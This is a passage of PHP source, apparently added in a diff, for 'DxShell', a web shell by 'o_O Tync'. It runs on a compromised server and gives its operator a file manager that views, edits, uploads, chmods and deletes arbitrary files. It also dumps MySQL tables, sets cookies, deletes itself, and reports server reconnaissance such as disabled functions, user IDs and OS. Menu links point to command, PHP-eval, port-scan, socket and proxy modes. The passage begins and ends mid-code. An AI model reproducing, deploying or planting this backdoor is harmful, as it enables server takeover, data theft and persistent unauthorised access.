($_POST['dxsql_tables'] as $CUR_TABLE) + { $DxDOWNLOAD_File['content'].=str_repeat("\n", 5).'/* '.str_repeat('-', 40).' */'; + DxMySQL_FetchResult(DxMySQLQ('SHOW CREATE TABLE `'.$CUR_TABLE.'`;', false), $DUMP, true); + $DxDOWNLOAD_File['content'].="\n".$DUMP[0][1]; + $DxDOWNLOAD_File['content'].="\n\n"; + DxMySQL_FetchResult(DxMySQLQ('SELECT * FROM `'.$CUR_TABLE.'`;', false), $DUMP, true); + for ($i=0; $i<count($DUMP); $i++) + { + for ($j=0;$j<count($DUMP[$i]);$j++) $DUMP[$i][$j]=mysql_real_escape_string($DUMP[$i][$j]); + $DxDOWNLOAD_File['content'].="\n".'INSERT INTO `'.$CUR_TABLE.'` VALUES ("'.implode('", "', $DUMP[$i]).'");'; + } + } + } + +if ($_GET['dxmode']=='COOK' AND isset($_POST['dxparam'])) + { foreach ($_POST['dxparam'] as $name => $val) + { if ($name=='DXS_NEWCOOK') + { + if (empty($val['NAM']) or empty($val['VAL'])) continue; DxSetCookie($val['NAM'], $val['VAL'], time()+60*60*24*10); + } + else DxSetCookie($name, $val, (empty($val))?1:(time()+60*60*24*10)); + } + DxGotoURL(DxURL('leave', 'dxmode')); + die(); + } + +if (isset($_GET['dxinstant'])) + { $_GET['dxinstant']=strtoupper($_GET['dxinstant']); + if ($_GET['dxinstant']=='DEL') + { + $ok=@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + print '<script>window.alert("SELF '.( ($ok)?'deleted. Reload the page to believe me =)':'tried to delete but was unsuccessful' ).'");</script>'; + } + } + +function DxObGZ($s) {return gzencode($s);} + +if (isset($DxDOWNLOAD_File)) + {/* File downloader for everything */ + if (!$DXGLOBALSHIT) + { + if ($GLOB['SYS']['GZIP']['CanOutput']) + { + ini_set('output_buffering',4096); + ob_start("DxObGZ"); + header('Content-Encoding: gzip'); + } for ($i=0; $i<count($DxDOWNLOAD_File['headers']); $i++) header($DxDOWNLOAD_File['headers'][$i]); + print $DxDOWNLOAD_File['content']; + die(); + } + /* if u want to download file when $DXGLOBALSHIT, scroll down */ + } + +################################################################################### +####################++++++++++++++# M A I N #++++++++++++++++++#################### +################################################################################### +if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die(DxError('Unknown $_GET[\'dxmode\']! check $GLOB[\'DxMODES\'] array')); + +######## +######## Main HAT (blackhat? =))) ) +######## +if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die('Unknown $_GET[\'dxmode\']'); + +if ($DXGLOBALSHIT) + print str_repeat("\n", 20).'<!--SHELL HERE-->'; +?> +<html><head><title><?=$_SERVER['HTTP_HOST'];?> --= DxShell 1.0 - by o_O Tync =-- :: <?=$GLOB['DxMODES'][$_GET['dxmode']];?></title> +<Meta Http-equiv="Content-Type" Content="text/html; Charset=windows-1251"> +<link rel="shortcut icon" href="<?=DxURL('kill','dxmode');?>&dxmode=IMG&dximg=DxS"> +<http://leet.phpnet.us/sh.gif> +<style> +img {border-width:0pt;} +body, td {font-size: 10pt; color: #00B000; background-color: #000000; font-family: Arial;padding:2pt;margin:2pt; vertical-align:top;} +h1 {font-size: 14pt; color: #00B000; background-color: #002000; font-family: Arial Black; font-weight: bold; text-align: center;} +h2 {font-size: 12pt; color: #00B000; background-color: #002000; font-family: Courier New; text-align: center;} +h3 {font-size: 12pt; color: #F0F000; background-color: #002000; font-family: Times New Roman; text-align: center;} +caption {font-size: 12pt; color: #00FF00; background-color: #000000; font-family: Times New Roman; text-align:center; border-width: 1pt 3pt 1pt 3pt;border-color:#FFFF00;border-style:solid solid dotted solid;padding: 5pt 0pt;} +td.h2_oneline {font-size: 12pt; color: #00B000; font-family: Courier New; text-align: center;background-color: #002000; border-right-color:#00FF00;border-right-width:1pt;border-right-style:solid;vertical-align:middle;} +td.mode_header {font-size: 16pt; color: #FFFF00; font-family: Courier New; text-align: center;background-color: #002000; vertical-align:middle;} +table.outset, td.outset {border-width:3pt; border-style:outset; border-color: #004000;margin-top: 2pt;vertical-align:middle;} +table.bord, td.bord, fieldset {border-width:1pt; border-style:solid; border-color: #003000;vertical-align:middle;} +hr {border-width:1pt; border-style:solid; border-color: #005000; text-align: center; width: 90%;} +textarea.bout {border-color: #000000; border-width:0pt; background: #000000; font: 12px verdana, arial, helvetica, sans-serif; color: #00FF00; Scrollbar-Face-color:#000000;Scrollbar-Track-Color: #000000;} +td.listing {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:top;} +td.linelisting {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;} +table.linelisting {border-color: #003000;border-width:0pt 1pt; border-style:solid;} +td.js_floatwin_header {background-color:#003300;font-size:10pt;font-weight:bold;color:#FFFF00;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;} +td.js_floatwin_body {background-color:#000000;font-size:10pt;color:#00B000;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;} +font.rwx_sticky_bit {color:#FF0000;} +.highlight_txt {color: #FFFF00;} +.achtung {color: #000000; background-color: #FF0000; font-family: Arial Black; font-size: 14pt; padding:0pt 5pt;} + +input {font-size: 10pt;font-family: Arial; color: #E0E000; background-color: #000000; border-color:#00FF00 #005000 #005000 #FFFF00; border-width:1pt 1pt 1pt 3pt;border-style:dotted dotted dotted solid; padding-left: 3pt;overflow:hidden;} +input.radio {border-width:0pt;color: #FFFF00;} +input.submit {font-size: 12pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #002000; border-color: #00FF00; border-width:0pt 1pt 1pt 0pt; border-style: solid; padding:1pt;letter-spacing:1pt;padding:0pt 2pt;} +input.bt_Yes {font-size: 14pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #005000; border-color: #005000 #005000 #00FF00 #005000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;} +input.bt_No {font-size: 14pt;font-family: Impact, Arial Black; color :#FF0000; background-color: #500000; border-color: #500000 #500000 #FF0000 #500000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;} +input.bt_Yes:Hover {color:#000000; background-color:#00FF00;border-bottom-color:#FFFFFF;} +input.bt_No:Hover {color:#000000; background-color:#FF0000;border-bottom-color:#FFFFFF;} +textarea {color:#00FF00; background-color:#001000;border-color:#000000;border-width:0pt;border-style:solid;font-size:10pt;font-family:Arial;Padding:5pt; + Scrollbar-Face-Color: #00FF00; Scrollbar-Track-Color: #000500; + Scrollbar-Highlight-Color: #00A000; Scrollbar-3dlight-Color: #00A000; Scrollbar-Shadow-Color: #005000; + Scrollbar-Darkshadow-Color: #005000;} +select {background-color:#001000;color:#00D000;border-color:#D0D000;border-width:1pt;border-style:solid dotted dotted solid;} + +A:Link, A:Visited { color: #00D000; text-decoration: underline; } +A.no:Link, A.no:Visited { color: #00D000; text-decoration: none; } +A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #00FF00; background-color:#003300; text-decoration: overline; } +.Hover:Hover {color: #FFFF00; cursor:help;} +.HoverClick:Hover {color: #FFFF00; cursor:crosshair;} +span.margin {margin: 0pt 10pt;} +td.error {color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;} +td.warning {color:#000000; background-color: #D00000; font-size: 11pt;} +font.img_replacer {margin:1pt;padding:1pt;text-decoration: none;border-width:1pt;border-color:#D0D000;border-style:solid;} +</style> + +<?php +if (in_array($_GET['dxmode'], array('UPL', 'DIR', 'PRT'))) + { /* THIS FLOATING WINDOW IS ONLY SET FOR MODES: */?> +<SCRIPT> +var dom = document.getElementById?1:0; +var ie4 = document.all && document.all.item; +var opera = window.opera; //Opera +var ie5 = dom && ie4 && !opera; +var nn4 = document.layers; +var nn6 = dom && !ie5 && !opera; +var vers=parseInt(navigator.appVersion); +var good_browser = (ie5 || ie4); +function showwin(hdr,txt,w,vis) +{ +if(good_browser) + { + var obj = document.all('js_floatwin'); + var evnt = event; + var xOffset = document.body.scrollLeft; + var yOffset = document.body.scrollTop; + + var temp = + "<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="+ w +">" + +((hdr!='')?("<TR><TD class=js_floatwin_header>"+ hdr + "</TD></TR>"):"") + +"<TR><TD class=js_floatwin_body>" + txt + "</TD></TR>" + +"</TABLE>"; + + if (vis == 1) + { + obj.innerHTML = temp; + obj.style.width = w; + hor = document.body.scrollWidth - obj.offsetWidth; + posHor = xOffset + evnt.clientX + 10; + posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5; + posVer = yOffset + evnt.clientY - obj.offsetHeight - 5; + + if (posHor<hor) + obj.style.posLeft = posHor + else + obj.style.posLeft = posHor2; + + obj.style.posTop = posVer; + + obj.style.visibility = "visible"; + } + else + { + obj.style.visibility = "hidden"; + obj.style.posTop = 0; + obj.style.posLeft = 0; + } + } +} +function movewin() +{ +if (good_browser) + { + var obj = document.all('js_floatwin'); + var evnt = event; + var xOffset = document.body.scrollLeft; + var yOffset = document.body.scrollTop; + + hor = document.body.scrollWidth - obj.offsetWidth; + posHor = xOffset + evnt.clientX + 10; + posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5; + posVer = yOffset + evnt.clientY - obj.offsetHeight - 5; + + if (posHor<hor) + obj.style.posLeft = posHor + else + obj.style.posLeft = posHor2; + + obj.style.posTop = posVer; + } +} +</SCRIPT> +<?php } /* /END */?> + +</head> +<body> +<?php +if ($DXGLOBALSHIT) /* tries to kill all the fucking bug.php pre-output, if ob_clean() failed */ + { print str_repeat("\n", 10).'<!--SHIT KILLER-->'; + print "\n".'</body></a>'.str_repeat('</table>', 5).str_repeat('</div>', 5).str_repeat('</span>', 5).str_repeat('</pre>', 1).str_repeat('</font>', 5).str_repeat('</script>', 2); + print "\n".'<TABLE WIDTH=100% BORDER=0 style="position:absolute;z-index:100;top:0pt;left:0pt;width:100%;height:100%;"><tr><td>'; + print "\n\n\n\n"; + } +?> + +<div id="js_floatwin" style="z-index:50;position:absolute;left:0;top:0;visibility:hidden"></div> +<table width=100% cellspacing=0 cellpadding=0 class=outset> +<tr> + <td width=100pt class=h2_oneline><a href="<?=DxURL('kill', '');?>&dxmode=WTF" class=no><h1>DxShell<br>v<?=$GLOB['SHELL']['Ver'];?></td> + <td> +<?php +print "\n".'<div style="margin-right:'.( ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)?'100':'30' ).'pt;">'; +print "\n".( ($DXGLOBALSHIT)?'<font color=#FF0000><b>GLOBALSHIT</b></font> ; ':'' ); +print "\n".DxPrint_ParamState('php_ver', phpversion() ).' ; '; +print "\n".DxPrint_ParamState('php_Safe_Mode', $GLOB['PHP']['SafeMode'], '!' ).' ; '; +print "\n".DxPrint_ParamState('magic_quotes', (bool)get_magic_quotes_gpc(), '!' ).' ; '; +print "\n".DxPrint_ParamState('gZip', function_exists('gzencode') ).' ; '; +print "\n".DxPrint_ParamState('cURL', function_exists('curl_version') ).' ; '; +print "\n".DxPrint_ParamState('MySQL', function_exists('mysql_connect') ).' ; '; +print "\n".DxPrint_ParamState('MsSQL', function_exists('mssql_connect') ).' ; '; +print "\n".DxPrint_ParamState('PostgreSQL', function_exists('pg_connect') ).' ; '; +print "\n".DxPrint_ParamState('Oracle', function_exists('ocilogon') ).' ; '; +print "\n".'Disabled functions: '.((($df=@ini_get('disable_functions'))=='')?'<font color=#00FF00><b>NONE</b></font>':'<font color=#FF0000><b>'.str_replace(array(',',';'), ', ', $df).'</b></font>'); +print "\n".'</div>'; + +print "\n\n".'<span align=right style="position:absolute;z-index:1;right:0pt;top:0pt;"><table><tr><td class="h2_oneline"><nobr>'; +if ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2) + print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=logoff" title="Log Off" class=no>[Exit]</a>'; +print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=DEL" title="Delete self ('.basename($_SERVER['PHP_SELF']).')" class=no><font color=#FF0000;>'.DxImg('del').'</font></a>'; +print "\n".'</nobr></td></tr></table></span>'; + +print "\n\n".'<hr>'; +print "\n".'Disk free: <b>'.DxStr_FmtFileSize(disk_free_space($GLOB['FILES']['CurDIR'])).' / '.DxStr_FmtFileSize(disk_total_space($GLOB['FILES']['CurDIR'])).'</b> ; '; +print "\n".'OS: <b>'.$GLOB['SYS']['OS']['id'].' ('.$GLOB['SYS']['OS']['Full'].' )</b> ; '; +print "\n".'Yer_IP: <b>'.@$_SERVER['REMOTE_ADDR'].' ('.@$_SERVER['REMOTE_HOST'].')</b> ; '; +print "\n".'<nobr>Own/U/G/Pid/Inode:<wbr><b>'.get_current_user().' / '.getmyuid().' / '.getmygid().' / '.getmypid().' / '.getmyinode().'</b> ; </nobr>'; +print "\n".'MySQL : <b>'.@mysql_get_server_info().'</b> ; '; +print "\n".'<br>'.@$_SERVER['SERVER_SOFTWARE']; +?> + </td> +</table> +<table width=100% cellspacing=0 cellpadding=0 class=outset> +<tr> + <td width=100pt class=h2_oneline><h2>Modes</td> + <td style="text-align:center;"><nobr> + <a href="<?=DxURL('kill', '');?>&dxmode=DIR">DIR</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=F_VIEW">VIEW</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=FTP<?=((!empty($_GET['dxdir']))?'&dxdir='.$_GET['dxdir']:'');?>">FTP</a> + <td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr> + <a href="<?=DxURL('leave', 'dxsql_s,dxsql_l,dxsql_p,dxsql_d');?>&dxmode=SQL">SQL</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=PHP">PHP</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=COOK">COOKIE</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=CMD">CMD</a> + <td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr> + <a href="<?=DxURL('kill', '');?>&dxmode=MAIL">MAIL</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=STR">STR</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=PRT">PORTSCAN</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=SOCK">SOCK</a> | + <a href="<?=DxURL('kill', '');?>&dxmode=PROX">PROXY</a> + </td> + </tr> +</table> + +<?php $DX_Header_drawn=true; ?> + +<?php +################################################# +######## +######## DXGLOBALSHIT DOWNLOADER +######## +if (isset($DxDOWNLOAD_File)) /* only when DXGLOBALSHIT is enabled */ + { print "\n".'<table align=center><tr><td class=mode_header><b>Download file</td></tr></table>'; + print "\n".'The fact you see this means that "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit, so no headerz could be sent =(('; + print "\n".'<br>Exclusively, DxShell is proud to present an additional way to download files...Just execute the php-script given below, and it will make the file u\'re trying to download'; + + if ($GLOB['SYS']['GZIP']['CanUse']) $DxDOWNLOAD_File['content']=gzcompress($DxDOWNLOAD_File['content'], 6); + + print "\n\n".'<br><br>'; + print "\n".'<textarea rows=30 style="width:90%" align=center>'; + print "\n".'<?php'."\n".' //Execute this, and you\'ll get the requested "'.$DxDOWNLOAD_File['filename'].'" in the same folder with the script ;)'; + print "\n".'// The file is '.( ($GLOB['SYS']['GZIP']['CanUse'])?'gzcompress()ed and':'' ).' base64_encode()ed'; + print "\n\n".'$encoded_file=\''.base64_encode($DxDOWNLOAD_File['content']).'\';'; + print "\n\n\n\n"; + print "\n".'$f=fopen(\''.$DxDOWNLOAD_File['filename'].'\', \'w\');'; + print "\n".'fputs($f, '.( ($GLOB['SYS']['GZIP']['CanUse'])?'gzuncompress(base64_decode($encoded_file))':'base64_decode($encoded_file)' ).');'; + print "\n".'fclose($f);'; + print "\n".'//Yahoo, hacker, the file is here =)'; + print "\n".'?>'; + print "\n".'</textarea>'; + die(); + } + +?> + +<table align=center> + <tr><td class=mode_header> + @MODE: <b><?=$GLOB['DxMODES'][$_GET['dxmode']];?> + </td></tr></table> +<? + +######## +######## AboutBox +######## +if ($_GET['dxmode']=='WTF') + { + ?> +<table align=center class=nooooneblya><tr><td><div align=center> +<?php +print '<a href="http://hellknights.void.ru/">'.DxImg('exec').'</a>'; +print '<br>o_O Tync, ICQ# 244-648'; +?><br><br> +<textarea name="LolBox" class=bout style="width:500pt; height:500pt;"></textarea></table> +<SCRIPT language=Javascript><!-- +var tl=new Array( +"Kilobytes of c0de, litres of beer, kilometers of cigarettes (*no drugs*), and for what purpose?", +"What's wrong with other shells?", +"Usability, functionality, bugs?... NO.", +"The main bug is: these shells ARE NOT mine =)", +"Just like to be responsible for every motherfucking byte of code.", +"Enjoy!", +"-----------------------------------", +"o_O Tync, http://hellknights.void.ru/, ICQ#244648", +"DxShell v<?=$GLOB['SHELL']['Ver'].', date '.$GLOB['SHELL']['Date'];?>", +"", +"Greetz to: ", +"iNfantry the Ruler", +"Nik8 the Hekker", +"_1nf3ct0r_ the Father", +"Industry of Death the betatest0r =)", +"", +"Thanks to:", +"Dunhill the cigarettes, Tuborg the beer, PHP the language, Nescafe the Coffee, Psychedelic the Music", +"", +"Wartime testers & debuggers ::: =))) :::", +"MINDGROW", +"", +"", +"Hekk da pl0net!", +"--- EOF ---" +); +var speed=40;var index=0; text_pos=0;var str_length=tl[0].length;var contents, row; +function type_text() +{contents='';row=Math.max(0,index-50); +while(row<index) contents += tl[row++] + '\r\n'; +document.getElementById("LolBox").value = contents + tl[index].substring(0,text_pos)+'|'; +if(text_pos++==str_length) + {text_pos=0;index++; + if(index!=tl.length) + {str_length=tl[index].length;setTimeout("type_text()",1000); + } + } else setTimeout("type_text()",speed); +}type_text(); +//--> +</SCRIPT> + <?php + } + + + ################################### + +######## +######## Upload file +######## +if ($_GET['dxmode']=='UPL') + { + if (empty($_POST['dxdir']) AND empty($_GET['dxdir'])) die(DxError('Uploading without selecting directory $_POST/$_GET[\'dxdir\'] is restricted')); + + if (isset($_FILES['dx_uplfile']['tmp_name'])) + { + $GETFILE=file_get_contents($_FILES['dx_uplfile']['tmp_name']); + DxFiles_UploadHere($_POST['DxFTP_FileTO'], $_FILES['dx_uplfile']['name'], $GETFILE); + } + else + { + print "\n".'<form action="'.DxURL('leave','dxmode,dxsimple').'" enctype="multipart/form-data" method=POST>'; + print "\n".'<input type="hidden" name="MAX_FILE_SIZE" value="'.$GLOB['PHP']['upload_max_filesize'].'">'; + print "\n".'<font class="highlight_txt">Max: '.DxStr_FmtFileSize($GLOB['PHP']['upload_max_filesize']).'</font>'; + print "\n".'<br><input type=text name="dxdir" value="'.$_GET['dxdir'].'" SIZE=50>'; + print "\n".'<br><input type=file name="dx_uplfile" SIZE=50>'; + print "\n".'<input type=submit value="Upload" class="submit"></form>'; + } + } + + ################################### + +######## +######## Directory listings +######## +if ($_GET['dxmode']=='DIR') + { + if (empty($_GET['dxdir'])) $_GET['dxdir']=realpath($GLOB['FILES']['CurDIR']); + $_GET['dxdir']=DxFileOkaySlashes($_GET['dxdir']); + if (substr($_GET['dxdir'], -1,1)!='/') $_GET['dxdir'].='/'; + + print "\n".'<br><form action="'.DxURL('kill', '').'" method=GET style="display:inline;">'; + DxGETinForm('leave', 'dxmode'); + print "\n".'<input type=text name="dxdir" value="'.DxFileOkaySlashes(realpath($_GET['dxdir'])).'" SIZE=40>'; + print "\n".'<input type=submit value="Goto" class="submit"></form>'; + + print "\n".'<br>'.'<b>&gt;&gt; <b>'.$_GET['dxdir'].'</b>'; + if (!file_exists($_GET['dxdir'])) die(DxError('No such directory')); + if (!is_dir($_GET['dxdir'])) die(DxError('It\'s a file!! What do you think about listing files in a file? =)) ')); + + if (isset($_GET['dxparam'])) + { if ($_GET['dxparam']=='mkDIR') if ( !mkdir($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3)) ) DxError('Unable to mkDir. Perms?'); + if ($_GET['dxparam']=='mkFILE') if ( !touch($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3)) ) DxError('Unable to mkFile. Perms?'); + } + + if (!($dir_ptr=opendir($_GET['dxdir']))) die(DxError('Unable to open dir for reading. Perms?...')); + $FILES=array('DIRS' => array(), 'FILES' => array()); + while (!is_bool( $file = readdir($dir_ptr) ) ) + if (($file!='.') and ($file!='..')) if (is_dir($_GET['dxdir'].$file)) $FILES['DIRS'][]=$file; else $FILES['FILES'][]=$file; + asort($FILES['DIRS']);asort($FILES['FILES']); + + print "\n".'<span style="position:absolute;right:0pt;">'; + if (isset($_GET['dxdirsimple'])) print '<a href="'.DxURL('kill', 'dxdirsimple').'">[Switch to FULL]</a>'; + else print '<a href="'.DxURL('leave', '').'&dxdirsimple=1">[Switch to LITE]</a>'; + print '</span>'; + + $folderup_link=explode('/',$_GET['dxdir'].'../'); + if (!empty($folderup_link[ count($folderup_link)-3 ]) AND ($folderup_link[ count($folderup_link)-3 ]!='..')) + unset($folderup_link[ count($folderup_link)-3 ], $folderup_link[ count($folderup_link)-1 ]); + $folderup_link=implode('/', $folderup_link); + print "\n".str_repeat('&nbsp;',3).'<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.$folderup_link.'" class=no>' + .DxImg('foldup').' ../</a>'; + + print "\n".str_repeat('&nbsp;', 15).'<font class=highlight_txt>MAKE: </font>' + .'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkDIR">Dir</a>' + .' / ' + .'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkFILE">File</a>' + .' / '.str_repeat('&nbsp;',5) + .'<font class=highlight_txt>UPLOAD: </font>' + .'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">Form</a>' + .' / ' + .'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">FTP</a>' + ; + + print "\n".'<br>'.count($FILES['DIRS']).' dirs, '.count($FILES['FILES']).' files '; + print "\n".'<table border=0 cellspacing=0 cellpadding=0 ><COL span=15 class="linelisting">'; + for ($NOWi=0;$NOWi<=1;$NOWi++) + for ($NOW=($NOWi==0)?'DIRS':'FILES', $i=0;$i<count($FILES[$NOW]);$i++) + { $cur=&$FILES[$NOW][$i]; + $dircur=$_GET['dxdir'].$cur; + print "\n".'<tr>'; + print "\n\t".'<td class=linelisting '.((isset($_GET['dxdirsimple']) AND ($NOW=='DIRS'))?'colspan=2':'').'>' + .(($NOW=='DIRS')?DxImg('folder').' ' + . '<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.DxFileToUrl($dircur).'" class=no>':'') + .(($NOW=='FILES')?'<a href="'.DxURL('kill', '').'&dxmode=F_VIEW&dxfile='.DxFileToUrl($dircur).'" class=no>':'') + .htmlspecialchars($cur).'</td>'; + + if (!isset($_GET['dxdirsimple'])) + { + print "\n\t".'<td class=linelisting>' + .'<span '.DxDesign_DrawBubbleBox('File Info', '<b>Create time:</b><br>'.DxDate(@filectime($dircur)).'<br>' + .'<b>Modify time:</b><br>'. DxDate(@filemtime($dircur)).'<br>' + .'<b>Owner/Group:</b><br>'.(@fileowner($dircur)).' / '.(@filegroup($dircur)) + , 150).' class=Hover><b>INFO</span> </td>'; + print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=2':'').'>' + .((($i+$NOWi)==0)?'<span '.DxDesign_DrawBubbleBox('Perms legend', '1st: sticky bit:<br>"<b>S</b>" Socket, "<b>L</b>" Symbolic Link, "<b>&lt;empty&gt;</b>" Regular, "<b>B</b>" Block special, "<b>D</b>" Directory, "<b>C</b>" Character special, "<b>P</b>" FIFO Pipe, "<b>?</b>" Unknown<br>Others: Owner/Group/World<br>"<b>r</b>" Read, "<b>w</b>" Write, "<b>x</b>" Execute<br><br><b>Click to CHMOD', 400).' class=Hover>':'') + .'<a href="'.DxURL('kill', '').'&dxmode=F_CHM&dxfile='.DxFileToUrl($dircur).'" class=no>'.DxChmod_Oct2Str(@fileperms($dircur)).'</td>'; + } + + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting style="text-align:right;">'.DxStr_FmtFileSize(@filesize($dircur)).'</td>'; + + if (!isset($_GET['dxdirsimple'])) + { + if ($NOW=='DIRS') print "\n\t".'<td class=linelisting colspan='.(($GLOB['SYS']['GZIP']['IMG'])?'4':'3').'>&nbsp;</td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($dircur).'" target=_blank>'.DxImg('view').'</a></td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($dircur).'">'.DxImg('ed').'</a></td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('downl').'</a></td>'; + if (($NOW!='DIRS') AND ($GLOB['SYS']['GZIP']['IMG'])) print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dx_gzip=Yeah&dxfile='.DxFileToUrl($dircur).'">'.DxImg('gzip').'</a></td>'; + print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_REN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('rename').'</a></td>'; + print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=3':'').'><a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($dircur).'">'.DxImg('del').'</a></td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_COP&dxfile='.DxFileToUrl($dircur).'">'.DxImg('copy').'</a></td>'; + if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_MOV&dxfile='.DxFileToUrl($dircur).'">'.DxImg('move').'</a></td>'; + } + print "\n\t".'</tr>'; + } + print "\n".'</table>'; + } + + +######## +######## File Global Actions +######## +if ('F_'==substr($_GET['dxmode'],0,2)) + { if (empty($_GET['dxfile'])) + { print "\n".'<form action="'.DxURL('kill', '').'" method=GET>'; + DxGETinForm('leave', ''); + print "\n".'<input type=text name="dxfile" value="" style="width:70%;">'; + print "\n".'<br><input type=submit value="Select" class="submit">'; + print "\n".'</form>'; + } + if (!file_exists(@$_GET['dxfile'])) die(DxError('No such file')); + print "\n\n".'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>'; + } + +######## +######## File CHMOD +######## +if ($_GET['dxmode']=='F_CHM') + { + if (isset($_GET['dxparam'])) + { if (chmod($_GET['dxfile'], octdec((int)$_GET['dxparam']))==FALSE) + print DxError('Chmod "'.$_GET['dxfile'].'" failed'); + else print 'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</b></font> )...<b>OK</b>'; + } + else + { print "\n".'<form action="'.DxURL('kill', '').'" method=GET>'; + DxGETinForm('leave', 'dxmode,dxfile'); + print "\n".'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</font> )'; + print "\n".'<br><input type=text name="dxparam" value="'. + //decoct(fileperms($_GET['dxfile'])) + substr(sprintf('%o', fileperms($_GET['dxfile'])), -4) + .'">'; + print "\n".'<input type=submit value="chmod" class="submit"></form>'; + } + } + +######## +######## File View +######## +if ($_GET['dxmode']=='F_VIEW') + { + if (!is_file($_GET['dxfile'])) die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) ')); + if (!is_readable($_GET['dxfile'])) die(DxError('File is not readable. Perms?...')); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=right><tr>'; + print "\n".'<td><h3>'.$_GET['dxfile'].'</h3></td>'; + print "\n".'<td>' + .'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'" target=_blank>'.DxImg('view').'</a>' + .'<a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('ed').'</a>' + .'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('downl').'</a>' + .'<a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('del').'</a>' + .'</td>'; + print "\n".'</tr></table><br>'; + print "\n".'Tip: to view the file "as is" - open the page in <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'">source</a> (<i>works best in Opera</i>), or <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">download</a> this file'; + + print "\n\n\n".'<br><hr><!-- File contents goes from here -->'."\n"; + print "\n".'<plaintext>'; + print file_get_contents($_GET['dxfile']); + die(); /* Plaintext is infinite */ + } + +######## +######## File Edit +######## +if ($_GET['dxmode']=='F_ED') + { + if (!is_file($_GET['dxfile'])) die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) ')); + if (isset($_POST['dxparam'])) + { if 